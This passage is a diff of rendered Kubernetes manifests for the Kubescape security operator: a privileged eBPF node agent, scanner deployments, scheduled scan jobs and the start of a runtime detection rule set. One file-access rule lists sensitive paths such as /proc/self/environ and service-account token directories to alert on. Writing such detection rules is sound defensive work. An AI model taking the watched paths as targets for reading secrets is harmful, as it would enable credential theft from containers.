emptyDir: {} + name: clamrun + - configMap: + items: + - key: clamd.conf + path: clamd.conf + - key: freshclam.conf + path: freshclam.conf + name: clamav + name: etc + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: node-agent + items: + - key: config.json + path: config.json + containers: + - name: node-agent + image: ghcr.io/k8sstormcenter/node-agent:dev-e64d59a + imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: /livez + port: 7888 + initialDelaySeconds: 60 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 7888 + initialDelaySeconds: 3 + periodSeconds: 3 + resources: + limits: + cpu: 500m + memory: 1400Mi + requests: + cpu: 100m + memory: 180Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: HOST_ROOT + value: /host + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: NAMESPACE_NAME + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KUBELET_ROOT + value: /var/lib/kubelet + - name: AGENT_VERSION + value: dev-e64d59a + - name: NodeName + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + privileged: false + capabilities: + add: + - SYS_ADMIN + - SYS_PTRACE + - NET_ADMIN + - SYSLOG + - SYS_RESOURCE + - IPC_LOCK + - NET_RAW + seLinuxOptions: + type: spc_t + volumeMounts: + - mountPath: /host + name: host + readOnly: true + - mountPath: /var/lib/kubelet + name: kubeletdir + - mountPath: /run + name: run + - mountPath: /var + name: var + readOnly: true + - mountPath: /lib/modules + name: modules + readOnly: true + - mountPath: /sys/kernel/debug + name: debugfs + - mountPath: /sys/fs/cgroup + name: cgroup + readOnly: true + - mountPath: /sys/fs/bpf + name: bpffs + - mountPath: /data + name: data + - mountPath: /profiles + name: profiles + - mountPath: /boot + name: boot + readOnly: true + - mountPath: /clamav + name: clamrun + - name: cloud-secret + mountPath: /etc/credentials +
readOnly: true + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + nodeSelector: + kubernetes.io/os: linux + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/os + operator: In + values: + - linux + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + template: + metadata: + annotations: + checksum/host-scanner-configmap: 0c613e2144b1680df672142a6083c39de89a1c781db9d1a60eb31789966a26ea + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubescape + image: quay.io/kubescape/kubescape:v3.0.47 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: http + containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /livez + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: KS_DOWNLOAD_ARTIFACTS + value: 'true' + - name: RULE_PROCESSING_GOMAXPROCS + value: '' + - name: KS_DEFAULT_CONFIGMAP_NAME + value: kubescape-config + - name: KS_DEFAULT_CONFIGMAP_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KS_CONTEXT + value: bobexample + - name: KS_DEFAULT_CLOUD_CONFIGMAP_NAME + value: ks-cloud-config + - name: KS_ENABLE_HOST_SCANNER + value: 'true' + - name: KS_SKIP_UPDATE_CHECK + value: 'false' + - name: KS_HOST_SCAN_YAML + value: /home/nonroot/.kubescape/host-scanner.yaml + - name: LARGE_CLUSTER_SIZE + value: '1500' + - name: KS_EXCLUDE_NAMESPACES + value: 
kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse + command: + - ksserver + resources: + limits: + cpu: 600m + memory: 1Gi + requests: + cpu: 250m + memory: 400Mi + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: kubescape-volume + mountPath: /home/nonroot/.kubescape + subPath: config.json + - name: host-scanner-definition + mountPath: /home/nonroot/.kubescape/host-scanner.yaml + subPath: host-scanner-yaml + - name: results + mountPath: /home/nonroot/results + - name: failed + mountPath: /home/nonroot/failed + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: host-scanner-definition + configMap: + name: host-scanner-definition + - name: kubescape-volume + emptyDir: {} + - name: results + emptyDir: {} + - name: failed + emptyDir: {} + serviceAccountName: kubescape + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + template: + metadata: + annotations: + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubevuln + image: quay.io/kubescape/kubevuln:v0.3.98 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: 8080 + resources: + limits: + cpu: 1500m + ephemeral-storage: 10Gi + memory: 5000Mi + requests: + cpu: 300m + ephemeral-storage: 5Gi + memory: 1000Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: 
KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: PRINT_POST_JSON + value: '' + - name: CA_MAX_VULN_SCAN_ROUTINES + value: '1' + args: + - -alsologtostderr + - -v=4 + - 2>&1 + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: grype-db-cache + mountPath: /home/nonroot/anchore-resources/db + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: grype-db + mountPath: /home/nonroot/.cache/grype + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tmp-dir + emptyDir: {} + - name: grype-db-cache + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: grype-db + emptyDir: {} + serviceAccountName: kubevuln + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + template: + metadata: + annotations: + checksum/operator-config: 4390a54f76466bfe8f7b90c12e53ada738e0cbc316cd132c17604a94c3b6d885 + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + checksum/capabilities-config: 6de901b4ead657e549bb9a6eef97eb55bbed2e0508a7a1875d2a48c9b29c0402 + checksum/matching-rules-config: 061617180b4f2780bd091c456b13a4b789654739862e082e4ad357c3ed226561 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: operator + image: quay.io/kubescape/operator:v0.2.121 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: trigger-port + containerPort: 4002 + protocol: TCP + - name: readiness-port + containerPort: 8000 + protocol: TCP + - name: admission-port + containerPort: 8443 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: readiness-port + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: readiness-port + initialDelaySeconds: 10 + periodSeconds: 5 + resources: + limits: + cpu: 300m + memory: 300Mi + requests: + cpu: 50m + memory: 100Mi + env: + - name: 
NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: HELM_RELEASE + value: kubescape-operator-1.30.2 + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: ks-capabilities + mountPath: /etc/config/capabilities.json + readOnly: true + subPath: capabilities.json + - name: cs-matching-rules + mountPath: /etc/config/matchingRules.json + readOnly: true + subPath: matchingRules.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: tls-certs + mountPath: /etc/certs + readOnly: true + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tls-certs + secret: + secretName: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + - name: tmp-dir + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: ks-capabilities + configMap: + name: ks-capabilities + items: + - key: capabilities + path: capabilities.json + - name: config + configMap: + name: operator + items: + - key: config.json + path: config.json + - name: cs-matching-rules + configMap: + name: cs-matching-rules + items: + - key: matchingRules.json + path: matchingRules.json + serviceAccountName: operator + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: prometheus-exporter + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: prometheus-exporter + image: quay.io/kubescape/prometheus-exporter:v0.2.11 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: metrics + containerPort: 8080 + protocol: TCP + livenessProbe: + tcpSocket: + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + tcpSocket: + port: 8080 + resources: + 
limits: + cpu: 50m + memory: 100Mi + requests: + cpu: 10m + memory: 10Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: ks-cloud-config + mountPath: /etc/config + readOnly: true + volumes: + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + serviceAccountName: prometheus-exporter + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + serviceAccountName: storage + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: apiserver + image: ghcr.io/k8sstormcenter/storage:dev-e64d59a + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + runAsNonRoot: true + livenessProbe: + httpGet: + path: /livez + port: 8443 + scheme: HTTPS + readinessProbe: + httpGet: + path: /readyz + port: 8443 + scheme: HTTPS + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: data + mountPath: /data + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: ca-certificates + mountPath: /etc/storage-ca-certificates + readOnly: true + resources: + limits: + cpu: 1500m + memory: 1500Mi + requests: + cpu: 100m + memory: 400Mi + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: data + persistentVolumeClaim: + claimName: kubescape-storage + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: storage + items: + - key: config.json + path: config.json + - name: ca-certificates + secret: + secretName: storage-ca +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: 
kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core +spec: + schedule: 12 21 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubescape-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubescape-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubescape + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubescape-scheduler + configMap: + name: kubescape-scheduler +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubevuln-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core +spec: + schedule: 24 0 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubevuln-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + 
runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubevuln-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubevuln + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubevuln-scheduler + configMap: + name: kubevuln-scheduler +--- +apiVersion: apiregistration.k8s.io/v1 +kind: APIService +metadata: + name: v1beta1.spdx.softwarecomposition.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: spdx.softwarecomposition.kubescape.io + groupPriorityMinimum: 1000 + versionPriority: 15 + version: v1beta1 + service: + name: storage + namespace: honey + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: scheduling.k8s.io/v1 +kind: PriorityClass +metadata: + name: kubescape-critical + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-critical + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-critical + tier: ks-control-plane + kubescape.io/ignore: 'true' +value: 100000100 +globalDefault: false +description: This priority class is for node-agent daemonset pods +--- +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey + annotations:
null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + rules: + - name: Unexpected process launched + enabled: true + id: R0001 + description: Detects unexpected process launches that are not in the baseline + expressions: + message: '''Unexpected process launched: '' + event.comm + '' with PID '' + + string(event.pid)' + uniqueId: event.comm + '_' + event.exepath + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm))' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - process + - exec + - applicationprofile + - name: Files Access Anomalies in container + enabled: false + id: R0002 + description: Detects unexpected file access that is not in the baseline + expressions: + message: '''Unexpected file access detected: '' + event.comm + '' with PID '' + + string(event.pid) + '' to '' + event.path' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: "(event.path.startsWith('/etc/') || event.path.startsWith('/var/log/')\ + \ || event.path.startsWith('/var/run/') || event.path.startsWith('/run/')\ + \ || event.path.startsWith('/var/spool/cron/') || event.path.startsWith('/var/www/')\ + \ || event.path.startsWith('/var/lib/') || event.path.startsWith('/opt/')\ + \ || event.path.startsWith('/usr/local/') || event.path.startsWith('/app/')\ + \ || event.path == '/.dockerenv' || event.path == '/proc/self/environ')\ + \ && !(event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/tmp'))\n&& !ap.was_path_opened(event.containerId,\ + \ event.path)\n" + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0009 + mitreTechnique: T1005 + tags: + - anomaly + - file + - open + - applicationprofile + - name: Syscalls Anomalies in container + enabled: true + id: R0003 + description: Detects unexpected system calls that are not whitelisted by application + profile + expressions: + message: '''Unexpected system call detected: '' + event.syscallName + '' with + PID '' + string(event.pid)' + uniqueId: event.syscallName + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - syscall + - applicationprofile + - name: Linux Capabilities Anomalies in container + enabled: true + id: R0004 + description: Detects unexpected capabilities that are not whitelisted by application + profile + expressions: + message: '''Unexpected capability used: '' + event.capName + '' in syscall '' + + event.syscallName + '' with PID 